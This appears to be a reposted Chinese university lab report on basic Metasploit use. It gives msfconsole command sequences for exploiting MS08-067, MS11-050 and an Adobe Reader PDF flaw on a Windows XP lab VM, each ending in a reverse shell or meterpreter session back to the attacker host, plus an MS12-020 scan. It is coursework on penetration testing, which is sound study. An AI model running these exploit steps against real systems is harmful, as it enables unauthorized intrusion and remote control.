作者:kaga1990_106 | 来源:互联网 | 2023-09-02 20:51
20165107网络对抗技术Exp5MSF基础应用1.实验内容1.1一个主动攻击实践,如ms08_067(成功)1.2一个针对浏览器的攻击,如ms11_050(成功)1.3一
20165107 网络对抗技术 Exp5 MSF基础应用
1.实验内容
1.1一个主动攻击实践,如ms08_067(成功)
1.2 一个针对浏览器的攻击,如ms11_050(成功)
1.3 一个针对客户端的攻击,如Adobe(成功)
1.4 成功应用任何一个辅助模块,如scanner/rdp/ms12_020_check(唯一,成功)
2.基础问题回答:用自己的话解释什么是exploit,payload,encode.
- exploit相当于是载具,是渗透攻击模块,将负责攻击的代码传送到靶机中。
- payload相当于载荷,是我们exploit中shellcode中的主要功能代码,负责执行攻击。
- Encode用于对payload进行编码,通过修改字符,实现免杀,不让杀软轻易的发现payload是攻击代码。
3.实验过程
任务一:一个主动攻击实践——漏洞MS08_067
安全公告:KB958644 时间:2008年底
原理:攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC请求,通过MSRPC接口调用serve服务函数NetPathCanonicalize函数对进行远程访问的路径规范化,而此函数中存在栈缓冲区内存漏洞,可被利用实施远程代码执行
详细原理说明:在规范化路径操作中,就是将路径字符串中'/'置换成''以及出去相对路径(例如:'.'),而服务程序在这部分的地址空间检查存在逻辑漏洞,攻击者可以在函数除去“..”字符串时,将路径字符串中的内容复制到路径串之前的地址空间中,覆盖掉返回地址执行shellcode(原理类似我们之前所做的缓冲区溢出攻击)
受影响的操作系统:windows 2000/xp/server 2003/server 2008/vista/7 Beta
靶机:Windows XP SP3 English IP:192.168.150.135
主机:Kali IP:192.168.150.132
先用search ms08_067指令查询一下针对该漏洞可以运用的攻击模块.
再用use exploit/windows/smb/ms08_067_netapi使用该模块,再使用show payloads查看可以供我们使用的payload.
我们的目的是为了获取靶机的shell,因此这里我们选择通过反向连接来获取shell的generic/shell_reverse_tcp当payload,使用指令set payload generic/shell_reverse_tcp对payload进行设置。再使用指令show options查看我们需要设置的参数,发现需要设置一个RHOST(远程主机,即靶机的IP地址)和一个LHOST(本地主机,即攻击机的IP地址).
接着使用exploit指令开始攻击,攻击成功后获取了靶机的shell,使用dir指令查看目录文件.
任务二:一个针对浏览器的攻击,如ms11_050.
原理:IE浏览器MSHTML模块在处理无效标签时存在use-after-free漏洞
影响范围:IE Exploer 7 以及 IE Exploer 8
靶机:Windows XP SP3 English IP:192.168.150.135
主机:Kali IP:192.168.150.132
在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.150.132//攻击机ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5107//攻击端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 5107ky //统一资源标识符路径设置
msf exploit(ms11_050_cobjectelement) > exploit.
在访问http://192.168.150.132:8080/5107ky时,可见攻击机出现访问信息.
kali连接成功!
任务三:一个针对客户端的攻击Adobe_cooltype_sing.
这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出。
攻击机:kali IP:192.168.150.136 靶机:windows XP sp3 IP:192.168.150.135 Adobe:9.3
在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp` //tcp反向回连
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.150.136 //攻击机ip
msf exploit(adobe_cooltype_sing) > set LPORT 5107 //攻击端口
msf exploit(adobe_cooltype_sing) > set FILENAME 5107.pdf //设置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit //攻击
可成功生成5107.pdf
将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:
msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
msf exploit(handler) > set LHOST 192.168.150.136 //攻击机ip
msf exploit(handler) > set LPORT 5107 //攻击端口固定
msf exploit(handler) > exploit
然后在靶机上打开5107.pdf文件
kali连接成功!
任务四:成功应用任何一个辅助模块——rdp/ms12_020check.
首先打开辅助模块
找到测试需要的模块:auxiliary/scanner/rdp/ms12_020_check,它的作用是扫描验证目标机是否具有此漏洞,具体步骤如下所示.
经过exploit运行后显示关于漏洞是否可利用是不可靠的
4.思考题:离实战还缺些什么技术或步骤
本次实验对靶机的版本、对补丁的要求很多,系统均用的是较老的版本,对于现实的攻击情况已经不大适用,要想研究最新的msf攻击技术,就要继续深入学习,掌握更多msf工具,并不断提升自己的代码编程能力。
5.实验感想
本次实验我对MSF工具进行了基础运用,体会到了msf工具的功能强大,在实验过程中,寻找合适版本的的虚拟机并安装用时较长,在寻找工具过程中,体会到学会查找工具的用途也很重要,如show targets、show payloads等命令。实验过程很有趣,攻击成功有小小的成就感,本次msf基础实验也是为后续实验打基础,接下来还需继续深入学习研究。